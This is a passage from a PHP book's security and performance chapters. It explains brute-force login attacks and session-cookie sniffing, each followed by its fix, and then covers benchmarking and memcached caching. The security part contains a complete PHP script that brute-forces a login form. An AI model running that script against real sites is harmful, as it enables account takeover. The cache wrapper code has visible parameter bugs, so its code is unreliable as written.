results in the given hash, which can take an extensive amount of time. In short, it’s
become enough trouble to obtain the password at this point that the attacker is likely
to give up.
This method will work on most PHP installations. Additionally, there are other
methods that can be undertaken to secure passwords.
Online Resources
Password storage and encryption is a broad area of study; the finer details are beyond
the scope of this section. The PHP manual has loads of information on hashing,
salting, and password protection techniques. For more, check out these sources:
■ http://php.net/mcrypt
■ http://www.openwall.com/phpass/
■ http://codahale.com/how-to-safely-store-a-password/
■ http://shiflett.org/blog/2005/feb/sha-1-broken
■ http://benlog.com/articles/2008/06/19/dont-hash-secrets/
Brute Force Attacks
The barrier to entry for compromising a database or reversing encryption of its
passwords may often be too high. In such cases, the attacker may resort to using a
script that simulates the HTTP requests a normal user would send with a web
browser to log in to a web application, trying random passwords with a given
username until the correct one is found. This is known as a brute force attack.
Security
The Attack
An attacker may use a general purpose script or write one specific to a site they
want to compromise. In either case, such a script will usually execute an HTTP request representing an attempt to log in to the web application; it will then check
the response for an indication that the login request succeeded or not. When a login
attempt fails, web applications usually redisplay the login form with a message indicating that result. Here’s an example of the markup that a failed login might generate:
<p class=”error”>Invalid username or password.</p>
<form method=”post” action=”http://example.com/login.php”>
<p>Username: <input type=”text” name=”username” /></p>
<p>Password: <input type=”password” name=”password” /></p>
<p><input type=”submit” value=”Log In” /></p>
</form>
A script to execute a brute force attack against this form might resemble the following:
chapter_05/brute_force.php
$url = 'http://example.com/login.php';
$post_data = array('username' => 'victims_username');
$length = 0;
$password = array();
$chr = array_combine(range(32, 126), array_map('chr',➥
range(32, 126)));
$ord = array_flip($chr);
$first = reset($chr);
$last = end($chr);
while (true) {
$length++;
$end = $length-1;
$password = array_fill(0, $length, $first);
$stop = array_fill(0, $length, $last);
while ($password != $stop) {
foreach ($chr as $string) {
$password[$end] = $string;
$post_data['password'] = implode('', $password);
$context = stream_context_create(array('http' => array(
'method' => 'POST',
'follow_location' => false,
195
196
PHP Master: Write Cutting-edge Code
'header' => 'Content-Type: application/➥
x-www-form-urlencoded',
'content' => http_build_query($post_data)
)));
$response = file_get_contents($url, false, $context);
if (strpos($response, 'Invalid username or password.')➥
=== false) {
echo 'Password found: ' . $post_data['password'], PHP_EOL;
exit;
}
}
for ($left = $end-1; isset($password[$left]) && $password➥
[$left] == $last; $left--);
if (isset($password[$left]) && $password[$left] != $last) {
$password[$left] = $chr[$ord[$password[$left]]+1];
for ($index = $left+1; $index <= $length; $index++) {
$password[$index] = $first;
}
}
}
}
This script sequentially generates passwords comprising all commonly used printable
characters that can be entered using a keyboard. It begins with passwords of length
1, but can be modified to begin with a longer length by simply modifying the initial
value of the $length variable. Once it generates all possible passwords of a given
length, it increments the length and begins the password generation process again
using the new length.
Using PHP streams, the script executes POST requests against the URL used by the
form and includes the username and generated password in the form data it submits.
The script then checks the response body for the substring indicating a failed login
attempt. If it doesn’t find the string, it assumes the password is correct, outputs it,
and terminates. More extensive error checking is likely needed in the HTTP request
logic, but the code shown is sufficient for the purposes of this example.
The Fix
Software like Fail2ban13 can integrate with firewalls to block users by IP, based on
excessive failed login attempts indicating brute force attacks. However, you may
13
http://www.fail2ban.org
Security
sometimes lack sufficient control over your server environment to install such
software. In such cases, prevention of this attack must be implemented at the application level.
Specific implementations of this can vary, but most of them boil down to temporarily
suspending the user’s ability to log in with a specific account. In some cases, this
is time-based, such as preventing login attempts for five minutes once a user has
failed to submit accurate credentials for an account three times. This limits the effectiveness of brute force attacks, both by increasing their necessary complexity and
by substantially extending the amount of time it takes to execute them.
Such implementations may also take into account the user’s IP address and only
prevent login attempts from that IP address. In general, attackers will be using a
completely different IP address from the victim they’re trying to compromise. Accounting for the IP address in this way prevents this measure against brute force
attacks from having an effect on legitimate account owners.
Another common tactic is to employ a CAPTCHA (Completely Automated Public
Turing test to tell Computers and Humans Apart), which presents the user with
some form of small task to determine if they are human or machine after a certain
number of failed login attempts. The exact nature of this task varies. Most CAPTCHA
implementations present the user with an image containing distorted text, and asks
them to enter the characters from that text into a text box. One interesting service
is reCAPTCHA , which employs the user input in a project to digitize books, and
includes an alternative audio version for visually disabled users. A popular alternative to the image approach is asking the user to answer a simple arithmetic problem,
such as “What is 2 + 2?”. While CAPTCHAs can be circumvented in some cases,
they can also make brute force attacks significantly more difficult to achieve.
Online Resources
Once again, the Open Web Application Security Project is the first place to head
for further reading on brute force attacks, and Wikipedia’s page on the topic is also
highly informative:
■ https://www.owasp.org/index.php/Brute_force_attack
■ http://en.wikipedia.org/wiki/Brute-force_attack
197
198
PHP Master: Write Cutting-edge Code
SSL
There is a method of capturing session identifiers and even user credentials that
we didn’t cover in the previous section on session hijacking. Let’s consider a common
scenario where multiple people are using an open wireless network at a café. In
such a situation where you don’t control who has access to the network you use,
it’s possible for others to employ programs called packet sniffers to intercept the
data your computer sends over the network. This includes HTTP requests. The
implications of this will become obvious shortly (if they’re yet to be already!).
The Attack
The victim connects to the café’s wireless network, opens their web browser, and
proceeds to pull up the landing page of a web application containing a login form.
They enter their username and password, and submit the form. At this point, an
HTTP request resembling this one is sent over the network:
POST /login.php HTTP/1.1
Host: example.com
username=victims_username&password=victims_password
Any attacker who is on the same network and has access to a packet sniffer—such
as the Firesheep extension for the Firefox web browser—can intercept this request,
obtain the victim’s credentials, and use them to impersonate the victim within that
web application.
Let’s say that by the time the attacker has connected to the network and started intercepting network traffic, the victim has since logged in to the web application.
That is, the attacker has missed the window of opportunity to intercept the victim’s
credentials. This doesn’t stop them from impersonating the user. Let’s examine a
request that the victim might send once they’ve logged in:
GET /somepage.php HTTP/1.1
Host: example.com
Cookie: PHPSESSID=82551688a6333d57647b3ae8807de118
If the cookie data looks familiar, it should: this is a cookie set by PHP to persist the
user’s session identifier. Recall that obtaining a valid session identifier, regardless
Security
of how it’s done, is the goal of both session fixation and session hijacking attacks.
At this point, the attacker has accomplished exactly that.
Any number of extensions for modern web browsers, such as the Web Developer
toolbar for Firefox, allows a user to manually add custom cookies for a particular
website. This makes it easy for an attacker to have their web browser use a victim’s
session identifier. Unless the web application has checks in place to combat session
hijacking, the attacker can access the web application from their browser as though
they were the victim.
The Fix
Session hijacking prevention measures may help here, but they’re insufficient to
solve the problem. The underlying issue is that traffic sent over the network is unmodified, and completely open for anyone with a packet sniffer to intercept.
The solution is to encrypt communications between the user and the web application
using SSL, or Secure Socket Layer, a protocol for transmitting private documents
via the Internet. Most modern web browsers support use of SSL. There are two steps
to implementing its usage on the web application side:
1. Obtain an SSL certificate from a trusted certificate authority, and configure web
servers hosting that application and its assets to use that certificate.
2. Implement any configuration or source code changes necessary such that the web
application forces clients accessing it to use HTTPS (which is HTTP encrypted
using SSL).
The exact details of the first step will vary based on the operating system and web
server being used; consult the documentation for what you’re using for more information on this. The second step can sometimes be accomplished by web server-level
configuration as well, such as with the mod_rewrite module for the Apache web
server. This is preferable because it can cover requests other than those for PHP
scripts. However, in some cases, you may want to enforce this at the application
level. This check is sufficient for most server environments:
199
200
PHP Master: Write Cutting-edge Code
chapter_05/ssl.php
$using_ssl = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] ==➥
'on' || $_SERVER['SERVER_PORT'] == 443;
if (!$using_ssl) {
header('HTTP/1.1 301 Moved Permanently');
header('Location: https://'.$_SERVER['SERVER_NAME'].$_SERVER➥
['REQUEST_URI']);
exit;
}
Recall that once a cookie is set for a domain, that cookie is persisted by the browser
in all subsequent requests to that domain. This includes requests for static assets
such as images, or CSS and JavaScript files. Thus, in order to prevent session
identifiers from being exposed, all requests made after one that sets a session
cookie must use SSL.
There was a point in time when the use of SSL on Facebook was limited to the request to log in to the site. Since the release of Firesheep, however, Facebook has
moved all requests to be behind SSL to prevent this type of session identifier leakage.
Online Resources
If you’re interested in reading more about SSL, take a look at these websites:
■ http://arst.ch/bgm
■ https://www.owasp.org/index.php/SSL_Best_Practices
Resources
This chapter is only meant to provide fundamental concepts needed to implement
security measures in your PHP applications. Your education in this subject should
not end here! The list of resources below provides a good starting point for supplementing the material covered by this chapter:
http://www.php.net/manual/en/security.php
The PHP manual has its own section on various
security concerns, some general and some specific
to environmental configuration. It’s a great starting
point for assessing your server setup and code.
Security
http://www.phparch.com
/books/phparchitects-guide-tophp-security/14
This book by Ilia Alshanetsky is a good steppingoff point for this chapter. It covers a few of the
same topics and then some, and does so in more
depth.
http://phpsecurity.org/15
This is the accompanying website for the book
Essential PHP Security, written by renowned security expert Chris Shiflett. It provides a comprehensive reference for PHP application security
topics.
http://www.informit.com/store/product.aspx?isbn=0672324547
The HTTP Developer’s Handbook is another title
by Chris Shiflett on the HTTP protocol, and includes several chapters related to SSL and security
as it applies to HTTP.
http://www.phparch.com
/magazine16
This monthly professional publication covers a
variety of PHP-related topics. Among its features
is the Security Corner column, which covers security topics of recent interest.
http://phpsec.org/projects/guide/ One of the projects of the PHP Security Consortium is the PHP Security Guide, a document that
describes common security vulnerabilities and
PHP-specific approaches for avoiding them.
https://www.owasp.org/index.php/Category:OWASP_Guide_Project
14
The Open Web Application Security Project
maintains several sub-projects, one of which is
the Development Guide. This document provides
practical guidance in application-level security
issues and includes code samples for several languages including PHP.
http://www.phparch.com/books/phparchitects-guide-to-php-security/
http://phpsecurity.org
16
http://www.phparch.com/magazine
15
201
202
PHP Master: Write Cutting-edge Code
http://www.enigmagroup.org/17 This site offers information and practical exercises
related to many potential attack vectors for web
applications as well as discussion forums. Note
that registering a user account is required to access
much of its content.
https://www.pcisecuritystandards.org/18
17
18
http://www.enigmagroup.org
https://www.pcisecuritystandards.org
The PCI Security Standards Council maintains
the de facto standard for security in systems that
facilitate online payments, such as ecommerce
applications.
Chapter
6
Performance
So you’re writing the next big thing, or at least trying to. Is it Google+ or Facebook?
You’ve got a limited budget, and you have to be ready for 100 to 100,000,000 hits
tomorrow!
You did your best during development to write efficient code, and it all seems fairly
speedy. One-second load times? That’s good enough, right? Except now you have
actual users, not just your small dev team hitting your server, and things are starting
to fall over … oh, no!
Benchmarking
There are two ways to know if your code needs performance help: by benchmarking
during development, or when your servers start to topple from the load. Benchmarking, as it relates to web applications, typically means “stress testing”—throwing as
much simulated traffic at your code as possible to measure how well it performs.
Unfortunately, benchmarking is more of a best-guess scenario, and even with all
the preproduction performance tweaks in the world, sometimes it’s just not enough.
Fortunately, this is where profiling comes in, and we’ll address that at the end of
this chapter.
204
PHP Master: Write Cutting-edge Code
There are two tools that we recommend for benchmarking: ApacheBench (ab) and
JMeter.1 To stress test we need two things: simultaneous users and numerous requests. In both these tools, the users are represented by the number of simultaneous
application threads. So just remember: concurrent threads = concurrent users.
ApacheBench is super simple and typically included with your Apache install, or
as part of the Apache development package—the binary is called simply ab. To use
ab, just specify the total number of requests (-n), and the number of simultaneous
threads (-c), and let it go to work. For example, here we are using –n 1000 –c 20
to create 20 simultaneous threads to perform 1,000 requests:
$ ab -n 1000 -c 20 http://example.org/
This is ApacheBench, Version 2.3 <$Revision: 655654 $>
Copyright 1996 Adam Twiss, Zeus Technology Ltd, http://➥
www.zeustech.net/
Licensed to The Apache Software Foundation, http://www.apache.org/
Benchmarking example.org (be patient)
Completed 100 requests
Completed 200 requests
Completed 300 requests
Completed 400 requests
Completed 500 requests
Completed 600 requests
Completed 700 requests
Completed 800 requests
Completed 900 requests
Completed 1000 requests
Finished 1000 requests
1
Server Software:
Server Hostname:
Server Port:
Apache/2.2.17
example.org
80
Document Path:
Document Length:
/
7452 bytes
Concurrency Level:
Time taken for tests:
Complete requests:
20
12.023 seconds
1000
http://jakarta.apache.org/jmeter/
Performance
Failed requests:
Write errors:
Total transferred:
HTML transferred:
Requests per second:
Time per request:
Time per request:
requests)
Transfer rate:
0
0
7904000 bytes
7452000 bytes
83.18 [#/sec] (mean)
240.450 [ms] (mean)
12.023 [ms] (mean, across all concurrent➥
642.02 [Kbytes/sec] received
Connection Times (ms)
min mean[+/-sd] median
Connect:
1
6
4.8
4
Processing:
62 233 49.6
229
Waiting:
62 231 50.1
227
Total:
63 239 49.5
235
max
30
708
705
714
Percentage of the requests served within a certain time (ms)
50%
235
66%
250
75%
263
80%
271
90%
299
95%
327
98%
366
99%
386
100%
714 (longest request)
Remember the Trailing Slash
As it’s the request path, ab will only perform the test if it has a trailing slash.
This performs 1,000 requests as quickly as possible using 20 concurrent connections.
To put that in perspective, if the server can service 20 requests per second, every
second of every day of any given month, that’s 50 million requests per month. We
managed 83 requests per second—that’s 215 million requests per month.
Looking at all this output, the parts we should be interested in seeing are:
■ time taken for tests
■ complete requests
■ failed requests
205
206
PHP Master: Write Cutting-edge Code
■ requests per second
■ connection times
The Connection Times section is very interesting, as it comprises four different
numbers:
Connection:
Processing:
Waiting:
Total:
how long it takes the web server to open a connection
how long the request takes, from the time of connection to the end
of the request
how long it takes Apache to process the request and send the full
response
how long the request takes from start to finish
ApacheBench barely supports testing of much more than basic GET requests, but
for this type of testing, it’s just too easy and quick to ignore.
JMeter is another Apache project with a GUI, and more capability. With JMeter, you
create a test plan, add thread groups (for example, X number of threads performing
N number of requests each), add samplers (such as performing an HTTP request),
specify their configuration, add other options like a cookie handler, and add
listeners to handle the results. Figure 6.1 shows an example of a JMeter setup.
Figure 6.1. JMeter comes with a handy GUI
Performance
This test plan consists of one thread group. We’re going to be doing two unique
HTTP requests in this thread group, so we want 10 threads each (total of 20), with
50 requests per thread (giving us 1,000 requests), as shown in Figure 6.2.
Figure 6.2. Creating our thread group
Within this thread group, we have a Cookie Manager, depicted in Figure 6.3; this
ensures that sessions are initialized.
207
208
PHP Master: Write Cutting-edge Code
Figure 6.3. The JMeter Cookie Manager
Next, we have our two HTTP requests: one for the home page and one for our login
screen, the latter shown in Figure 6.4. In this case, both are GET requests. We could
also set up the system to not clear cookies between requests, and have a POST for
login, and then a GET on a secure page.
Figure 6.4. The HTTP Request for our login screen
Performance
Finally, we have three result listeners. The first is shown in Figure 6.5 and will let
us inspect the requests themselves, in their entirety.
Figure 6.5. The JMeter View Results Tree shows us all requests
The second is a simple summary table, shown in Figure 6.6.
Figure 6.6. The JMeter Summary Report gives us an alternate view of results
Meanwhile the last, in Figure 6.7, shows the results in a graph.
209
210
PHP Master: Write Cutting-edge Code
Figure 6.7. JMeter also offers a graphical interpretation of results
In general, benchmarks are like IQ tests; that is, an IQ test only tests how well you
perform in IQ tests. Benchmarks are never true indicators of performance, other
than how well code performs in benchmarks. Benchmarks become useful when
comparing against other benchmarks; this allows you to have relative metrics on
performance enhancements.
One point to remember, and a common flaw people make, is that the benchmarking
tool requires resources, too; if you benchmark from the same machine serving the
website, you’ll always record false numbers. The results are still useful for those
relative metrics, but otherwise, they’re even more useless than benchmarks usually
are.
System Tweaks
Of course, your code isn’t to blame, right? PHP is fairly fast, and you wrote good
code—it has to be something else. Let’s start by looking at how we can optimize
our server configuration.
Code Caching
The first item we’re going to cover is opcode caches. You’ve probably heard since
your earliest days as a PHP developer that PHP is a scripting language, an interpreted
Performance
language, that no compiling is required … well, this isn’t exactly true. Stick with
us here.
PHP isn’t compiled in the traditional sense, whereby you compile the code with a
compiler like GCC (the GNU C Compiler), and deploy the resulting binary. However,
on each request, the PHP code is parsed, compiled to opcodes (or tokens), and those
tokens are then passed to the Zend Engine to be executed.
The PHP request life cycle is like an on-the-fly rendition of the Java life cycle. When
Java is compiled, it is parsed and compiled into an instruction set called bytecode;
on execution, that bytecode is executed by the JVM (Java Virtual Machine). The
Zend Engine is also considered a virtual machine.
Figure 6.8 shows the PHP and Java life cycles; notice how the only difference is
that the PHP opcodes are not saved as a binary file before execution.
Figure 6.8. The life cycle of a PHP script compared to a Java file
It turns out that in this regard at least, Java was right: the parse/compile phase is
slow. Who knew, right? But we can fix this, by using an opcode cache. An opcode
cache will store the opcodes after the first time, feeding them to the Zend Engine
upon subsequent requests. Figure 6.9 illustrates this new life cycle.
211
212
PHP Master: Write Cutting-edge Code
Figure 6.9. The life cycle of a PHP script using an opcode cache
In our experience, adding an opcode cache is the single most beneficial (and frankly,
easiest) thing you can do to speed up your code. Sometimes, an opcode cache is all
you need.
So, how do you install this magic? It’s simple:
$ pecl install apc
This will grab APC from PECL—the PHP Extension Community Library—compile,
and install the extension. After this, depending on your setup, you may then have
to edit your php.ini and add:
extension=apc.so
Restart PHP (that is, Apache), and you’re good to go.
Let’s now take a look at some benchmarks. This is against a Zend Framework-based
application running on a MacBook Pro (Quad Core i5 2.4GHz). First, without APC:
Performance
Concurrency Level:
Time taken for tests:
Complete requests:
Failed requests:
Write errors:
Total transferred:
HTML transferred:
Requests per second:
Time per request:
Time per request:
requests)
Transfer rate:
20
22.721 seconds
1000
0
0
5698000 bytes
5434000 bytes
44.01 [#/sec] (mean)
454.418 [ms] (mean)
22.721 [ms] (mean, across all concurrent➥
244.90 [Kbytes/sec] received
Connection Times (ms)
min mean[+/-sd] median
Connect:
0
5 14.7
1
Processing:
245 447 54.6
450
Waiting:
241 445 54.7
447
Total:
248 452 53.8
454
max
160
630
606
707
Percentage of the requests served within a certain time (ms)
50%
454
66%
475
75%
489
80%
495
90%
518
95%
533
98%
553
99%
571
100%
707 (longest request)
The line we are most interested in is the Requests per second, which for this page
is 44 requests per second. Now let’s enable APC, just by adding extension=apc.so
to our configuration (that is, using all the defaults), and see what happens:
Concurrency Level:
Time taken for tests:
Complete requests:
Failed requests:
Write errors:
Non-2xx responses:
Total transferred:
HTML transferred:
Requests per second:
20
11.049 seconds
1000
0
0
1000
5698000 bytes
5434000 bytes
90.51 [#/sec] (mean)
213
214
PHP Master: Write Cutting-edge Code
Time per request:
Time per request:
requests)
Transfer rate:
220.981 [ms] (mean)
11.049 [ms] (mean, across all concurrent➥
503.61 [Kbytes/sec] received
Connection Times (ms)
min mean[+/-sd] median
Connect:
0
6 17.4
2
Processing:
95 213 33.6
214
Waiting:
85 211 33.6
212
Total:
105 219 37.2
219
max
196
319
315
431
Percentage of the requests served within a certain time (ms)
50%
219
66%
231
75%
239
80%
245
90%
261
95%
277
98%
305
99%
361
100%
431 (longest request)
This time, we are achieving 90 requests per second. We’ve just effectively doubled
the usefulness of our hardware. You’ll notice that even the longest request was faster
than the fastest request without APC.
We can tweak this even further by adding apc.stat = 0 to our php.ini; this will
disable automatic updating of the cache when files are modified. This means you’ll
have to restart your web server or clear the cache when you make changes; but for
production servers that rarely see changes, this can be beneficial:
Concurrency Level:
Time taken for tests:
Complete requests:
Failed requests:
Write errors:
Non-2xx responses:
Total transferred:
HTML transferred:
Requests per second:
Time per request:
Time per request:
20
9.710 seconds
1000
0
0
1000
5678000 bytes
5414000 bytes
102.99 [#/sec] (mean)
194.202 [ms] (mean)
9.710 [ms] (mean, across all concurrent➥
Performance
requests)
Transfer rate:
571.05 [Kbytes/sec] received
Connection Times (ms)
min mean[+/-sd] median
Connect:
0
6 11.6
2
Processing:
81 187 33.3
188
Waiting:
81 185 33.3
186
Total:
82 193 34.6
193
max
129
283
272
332
Percentage of the requests served within a certain time (ms)
50%
193
66%
206
75%
215
80%
220
90%
236
95%
247
98%
260
99%
278
100%
332 (longest request)
As you can see, we are now up to 103 requests per second. Not too shabby, eh?
But what about Windows/IIS? Well, thanks to Microsoft there is a great Windows
opcode cache called WinCache. Simply obtain the extension from the WinCache
website,2 and place in your extensions directory.
Once you’ve done that, add the following to your php.ini and restart IIS:
extension=php_wincache.dll
It’s as easy as that.
INI Settings
Another setting that you can tweak for optimization is to use a different storage
mechanism for session data; in this case memcached. Memcached is a memorybased, cluster-friendly key-value store. If you enable the memcache extension
(ext/memcache), you’ll be able to automatically use memcached for session storage
instead of the disk:
2
http://www.iis.net/download/wincacheforphp
215
216
PHP Master: Write Cutting-edge Code
$ pecl install memcache # Install ext/memcache
$ memcached –d –m 128 # Start memcached
Once you have ext/memcache installed, you simply set your php.ini like so:
session.save_handler = "memcache"
session.save_path = "tcp://localhost:11211"
Now let’s take a look at our performance before and after, in Table 6.1.
Table 6.1. Performance Figures with and without Memcached
Storage Type
Average
Response Time
Minimum
Response Time
Maximum
Response Time
Requests per
Second
File-based
836
98
7106
23
MySQL-based
798
103
1848
24
Memcached-based
771
86
1473
25
So, we’re not seeing a huge difference in response time here: 23 (file) vs 24 (MySQL)
vs 25 (memcached) requests per second. However, it’s not always about raw speed.
Memcached is a networked daemon that can easily be spread across multiple servers.
In this case, multiple web servers can use it as a central store for their sessions. This
makes load balancing much easier; all sessions can easily be accessed from all web
servers in a cluster, without the overhead of a central RDBMS (relational database
management system).
As the number of sessions grows, memcached will scale far better.
Databases
Most websites these days have a database storing their data. When testing the performance of your website, it very quickly becomes apparent that for a large part of
the time, your application is working on database interaction. While a number of
sites are moving to so-called NoSQL (see the section called “Choosing How to Store
Data” in Chapter 2) to solve their performance problems, no document-based database
can truly live up to a relational database when you need relational data.
Performance
There are server configurations that can dramatically improve your database performance, but the best solution to performance issues is to focus on optimizing your
queries.
The method for optimizing your queries is going to vary based on the RDBMS (relational database management system) you use. Sometimes, however, no matter how
much you optimize a query, it just isn’t fast enough. This is when you need to start
thinking about caching. Typically, a memory-based cache like memcached (which
was built for caching of database queries) will be utilized for this task. Caching is
covered in the section called “Caching”.
File System
Disks are disks are disks. They can also cause massive bottleneck problems that are
difficult to solve if you need to store data on disk. While you can throw in faster
disks (15,000 RPM SCSI drives anybody?), better RAID strategies (“striping”), and
SSDs, there is still a limit you’re going to hit sooner or later.
The best strategy for this is to utilize memory-based caches for disk data where
possible. Whether it’s the configuration file you have to read on every request, or
the PHP files used to run the site, there are many options for this, and they all mean
one thing: caching.
Caching
What’s better than making your code run faster? Making it so it doesn’t have to run
at all. They say insanity is doing the same task over and over again and expecting
a different result; well, we do this all the time in our code. Are we all insane? We’d
sure hope not!
We can stop this insanity by caching each unique execution of a given piece of code.
That code might be a single SQL query (for example, using the MySQL query cache),
an API request, a section of a page (such as a news feed), or an entire page.
There are three things you must decide when caching:
1. What are you going to cache?
2. How long will you cache it for?
3. Where are you going to store it?
217
218
PHP Master: Write Cutting-edge Code
The answers to these three questions is tricky. Ideally, the greater part of your site
will be cacheable for long periods of time; unfortunately, this is rarely the case.
The mechanism for caching is always going to be the same:
1. Create a unique identifier for a specific piece of content. This should be reproducible for the same piece of content every time (don’t use an item like a timestamp!).
2. Check to see if something with the identifier exists in the cache.
3. If it exists, retrieve it.
4. If it doesn’t exist, generate it and store it.
5. Return the data.
Disk Cache
While we already know disk storage sucks, it’s still faster than generating complex
data. Its biggest issue is scaling—unless you’re going to spend thousands on a SAN
(storage area network), you’re stuck with less reliable network storage like Network
File System (NFS),3 Gluster,4 and Samba.5
APC
APC has the ability to store user data, (and not just your opcodes) using apc_store(),
apc_exists() and apc_fetch(). APC storage is super fast, but it’s confined to a
single machine.
Memcached
Memcached is built for caching. Initially built to cache MySQL queries, it’s a simple
key-value pair that works well for caching almost anything. Memcached uses memory
for caching, and you can set timeouts, or just let the memory fill up and push out
the oldest items, or both.
It can be pooled across multiple machines with ease, and is fast. Memcached is a
great solution for most caching storage, but it has a few caveats:
3
http://www.freebsd.org/doc/handbook/network-nfs.html
http://www.gluster.org/
5
http://www.samba.org/samba/what_is_samba.html
4
Performance
■ It can become CPU-bound; at this point, adding more nodes with more memory
is a losing proposition, causing slowdowns.
■ It has a 1MB value limit. The only way to change this is to modify the source
and recompile. If you are caching larger objects, this becomes an issue.
Let’s take a look at a memcached implementation which resolves our 1MB limit, as
well as allowing us to easily split our cache into segmented partitions that can be
cleared independently.
This simple idea uses partitions. Partitions are prefixes for the specified key—they
contain the name of the partition, and a number to indicate the revision of the partition. We also store another key that maintains the current revision of the partition.
So, if we have a partition for storing SQL queries—called sql—with a current revision of 1, and we use the SHA1 sum of a query as its key, we might see a key that
looks like:
sql_1_dabb46bddd6dd1dba1aadd8ac003bc17b7e9e0fb
To clear the partition cache, we simply increment the revision by 1. Now the next
time we check and cache the same query, the key will be:
sql_2_dabb46bddd6dd1dba1aadd8ac003bc17b7e9e0fb
This means you will no longer get a cache hit for the previously cached version,
and, as it’s no longer being hit, the value will quickly drop out of the cache. Additionally, the wrapper will check to see if a value is more than 1MB, and split it
across multiple values. By also storing a metadata key with the item, we can record
the number of slabs used.
Finally, by making that metadata a JSON data structure, we can add other information
like a last modified date (the storage date) and utilize that to automatically send
Last-Modified headers. We could also send an Expires header; however, since we
don’t always know how long an item will be cached for (for example, it’s updated
every time the data is changed), we’ve omitted this.
So what does this magical code look like?
219
220
PHP Master: Write Cutting-edge Code
chapter_06/cache.php
require_once 'Cache/Memcache.php';
// Instantiate our Cache
$cache = new Cache_Memcache();
// Use the REQUEST_URI as a key
$key = $_SERVER['REQUEST_URI'];
// Try to get our data
$data = $cache->get($key, 'blog-pages');
// If the data is not false, we got something valid
if ($data !== false) {
echo $data;
} else {
// Generate data, you can do this with buffering:
// Start the buffer
ob_start();
// output all the data to the buffer
⋮
// Retrieve and output the data at the same time
$data = ob_get_flush();
// Add it to the cache.
$cache->set($key, $data, 'blog-pages');
}
This super-simple code lets us cache our blog pages in the blog-pages partition,
where each page would be cached on first request. Additionally, we might have a
blog-settings partition, forum-posts partition, and so on. We can easily clear the
blog-pages partition when we update our blog template by calling:
require_once 'Cache/Memcache.php';
// Instantiate our Cache
$cache = new Cache_Memcache();
// Clear the cache
$cache->clearCache('blog-pages');
You can see the Cache_Memcache class in full below. The key to our Cache_Memcache
class is the addNamespace() method; this will create the namespace key if none
Performance
exists, and then return it. From that point, any data being stored in that partition
will have the key prepended by the namespace and namespace key.
Clearing the cache using the clearCache() method simply increments that key:
chapter_06/Memcache.php
/**
* Memcache Wrapper
*/
/**
* Memcache Wrapper
*
* Allows for partitioned cache
* that can be cleared on a partition basis.
*
* Uses keys that consist of a partition, followed
* by the current namespace key, followed by the
* cached items key e.g. sql_128_$sha1ofquery
*/
class Cache_Memcache {
/**
* @var bool Whether we are connected to at least one server➥
in the pool
*/
protected $connected = false;
/**
* @var Memcache
*/
protected $memcache = null;
protected $pool = array(
array('host' => 'localhost', 'port' => '11211', 'weight'➥
=> 1),
// Define other hosts here
);
/**
* Constructor
*/
public function __construct() {
$this->connect();
}
221
222
PHP Master: Write Cutting-edge Code
public function isConnected() {
return $this->connected;
}
/**
* Connect to the memcached pool
*
* @return void
*/
protected function connect() {
$this->connected = false;
$this->memcache = new Memcache();
foreach ($this->pool as $host) {
$this->memcache->addServer($host['host'], $host['port'],➥
true, $host['weight']);
// Confirm that at least one server in the pool connected
$stats = $this->memcache->getExtendedStats();
if ($this->connected || ($stats["{$host['host']}:➥
{$host['port']}"] !== false && sizeof($stats["{$host➥
['host']}:{$host['port']}"]) > 0)) {
$this->connected = true;
}
}
return $this->connected;
}
/**
* Returns the namespace value for the current partition
*
* This method will create a new namespace key for the current➥
partition.
*
* To clear the cache for a specific partition of the cache,➥
just increment
* this key.
*
* @param string $key
* @return string
*/
protected function addNamespace($partition = '') {
// If we're not connected, just return false
if (!$this->connected) {
Performance
return false;
}
// Get the current namespace key
$ns_key = $this->memcache->get($partition);
if ($ns_key == false) {
// No key currently set, set one at random
$ns_key = rand(1, 10000);
$result = $this->memcache->set($partition, $ns_key, 0, 0);
}
// Return the key with the naamespace key
$my_key = $partition . "_" . $ns_key . "_" . $key;
return $my_key;
}
/**
* Clears the cache by incrementing the namespace key
*
* @return void
*/
public function clearCache($partition = '') {
if (!$this->connected) {
return false;
}
// Memcache has a built in increment method
$this->memcache->increment($partition);
}
/**
* Add a value to the cache
*
* Will also add a metadata key
* with modified date and split
* large values (>=1MB) across
* multiple keys automatically.
*
* @param string $key
* @param string $value
* @param int $expires
* @return boolean
*/
public function set($key, $value, $partition = '',➥
223
224
PHP Master: Write Cutting-edge Code
$expires = 14400) {
// Define a constant so we don't have a magic number
define('ONE_MB', 1 * 1024 * 1024);
if (!$this->connected) {
return false;
} elseif (strlen($value) >= ONE_MB) {
// Value is more than 1MB, split it
$value = str_split($value, ONE_MB);
}
// Set an expiration of now plus timeout
if ($expires !== 0) {
$expires += time();
}
// Add the partion and namespace key to our item key
$ns_key = $this->addNameSpace($key, $partition);
$this->memcache->set($ns_key . '_metadata', json_encode➥
((object) array("modified" => gmdate('D, d M Y H:i:s') .➥
' GMT', 'slabs' => sizeof($value))),➥
MEMCACHE_COMPRESSED, $expires);
// If our value is split, we need to store it in➥
multiple keys
if (is_array($value)) {
foreach ($value as $k => $v) {
// Add an incrementing number to the key and store➥
the chunk
$this->memcache->set($ns_key . '_' . $k, $v,➥
MEMCACHE_COMPRESSED, $expires);
}
return true;
}
return $this->memcache->set($ns_key, $value,➥
MEMCACHE_COMPRESSED, $expires);
}
/**
* Returns the data for a given key.
*
* Returns false if no data exists.
*
Performance
* Automatically fetches the metadata key
* and sends the Last-Modified header.
*
* Automatically retrieves large values split
* across multiple slabs.
*
* Also sends an X-Cache-Hit header to indicate
* if the item was found in the cache.
*
* @param string $key
* @return string
*/
public function get($key, $partition = '') {
if (!$this->connected) {
return false;
}
$ns_key = $this->addNameSpace($key, $partition);
$meta = $this->memcache->get($ns_key . '_metadata');
// Send appropriate headers
if ($meta && !empty($meta) && !headers_sent()) {
$meta = json_decode($meta);
header("X-Cache-Hit: 1", false);
if (isset($meta->modified)) {
header('Last-Modified: ' . $meta->modified);
}
} elseif (!$meta && !headers_sent()) {
header("X-Cache-Hit: 0", false);
return false;
}
// Retrieve data split across multiple keys
$value = '';
if ($meta && isset($meta->slabs) && $meta->slabs > 1) {
// Item is split across keys
for ($i = 0; $i < $meta->slabs; $i++) {
// Concat each key to the previously returned data
$value .= $this->memcache->get($ns_key . '_' . $i);
}
} else {
// Item is not split
$value = $this->memcache->get($ns_key);
}
225
226
PHP Master: Write Cutting-edge Code
return $value;
}
/**
* Deletes the data for a given key.
*
* Returns true on successful deletion, false if unsuccessful.
*
* @param string $key
* @return boolean
*/
public function delete($key, $partition = '') {
if (!$this->connected) {
return false;
}
